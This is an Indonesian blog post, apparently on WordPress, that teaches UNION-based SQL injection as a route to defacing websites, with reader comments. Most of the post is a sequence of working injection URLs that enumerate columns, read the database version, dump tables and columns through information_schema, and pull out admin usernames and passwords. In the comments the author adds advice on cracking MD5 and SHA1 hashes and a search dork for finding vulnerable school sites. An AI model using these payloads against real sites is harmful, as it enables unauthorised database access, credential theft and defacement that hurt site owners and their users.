Belajar Defacing website


Halo semuanya,dah lama saya gak buat postingan baru nih🙂
Nah sekarang postingan baru saya akan berbau haking sedikit,yaitu SQL injection
Pengertian SQL Injection
—–>> Sql injection merupakan sebuat hacking yang dilakukan pada aplikasi client dengan cara memberikan perintah SQL yang pada akhirnya akan mengeksekusi DATABASE target dan para attaker akan mendapatkan Username dan Password dari site tersebut

Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus — yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice

Baiklah daripada banyak koped,mari kita mulai injeksinya
Pertama kita siapkan deh sekaleng coca-cola
kedua kita ambil uang limaribu, trus kewarung tetangga buat beli snack
ketiga buka celana,eh maksudnya buka browser
nagh selanjutnya cari site yang mempunyai bug SQL
Disini saya tidak menggunakan nama site sebenarnya,takut nanti kena masalah dengan pihak sitenya.===========
[+]step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100′ atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih bnyak lagi):

==========
[+]step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by

contoh: [site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)…
misal: [site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

sehingga muncul error atau hilang pesan error…
misal: [site]/berita.php?id=-100+order+by+9–

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8–

===========
[+]step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek
versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..

============
[+]step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–

seumpama table yang muncul adalah “admin

===========
[+]step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–

=============
[+] step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa–

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.piclist.com/techref/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E–

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–

contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–

==============
[+] step Delapan:=
==============

tahap terakhir mencari halam admin atau login

Semoga bermanfaat tutor seorang lamer yang haus akan ilmu pengetahuan !!
Maaf jika tutor yang saya buat tidak dapat membuat para pembaca puas🙂

6 Responses to Belajar Defacing website

  1. salim says:

    mas ikutisaya
    mau nanya nih. . . .
    saya sudah mencoba meninjeksinya,namun saya memiliki masalah pada saat melakukan cracking password
    mohon bantuanya ya

    • ikutisaya says:

      wah susah juga nih jelasinya mas salim
      buat password site itu,biasanya didecrip menggunakan has MD5 dan juga hash SHA1

      jadi untuk mencarinya gunakan saja google engine dengan keyword :encript password MD5 atau SHA 1(tergantung jenis password yang didapat)

  2. maksutnya berita.. kan itu biasanya diganti index.php, dll. tolong jelasin

    • ikutisaya says:

      Berita / index.php itu sama saja,,,, ^_^’ tergantung ama dork yang kita gunain
      contoh :sman.sch.id/berita.php?id=68
      sman.sch.id/index.php?id=68

      keduanya sama2 berpotensi ada bug sqli
      memang kalo kita baca di postingan laen atau tutorial dari forum
      kebanyakan memakai dork ”inurl:index.php?id=”
      kan gwa buat sendiri nih postingan jadina “index” wa ganti “berita” aja
      huft. .. . kra2 begitulah 😀

  3. rim says:

    I believe you are right completely..

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: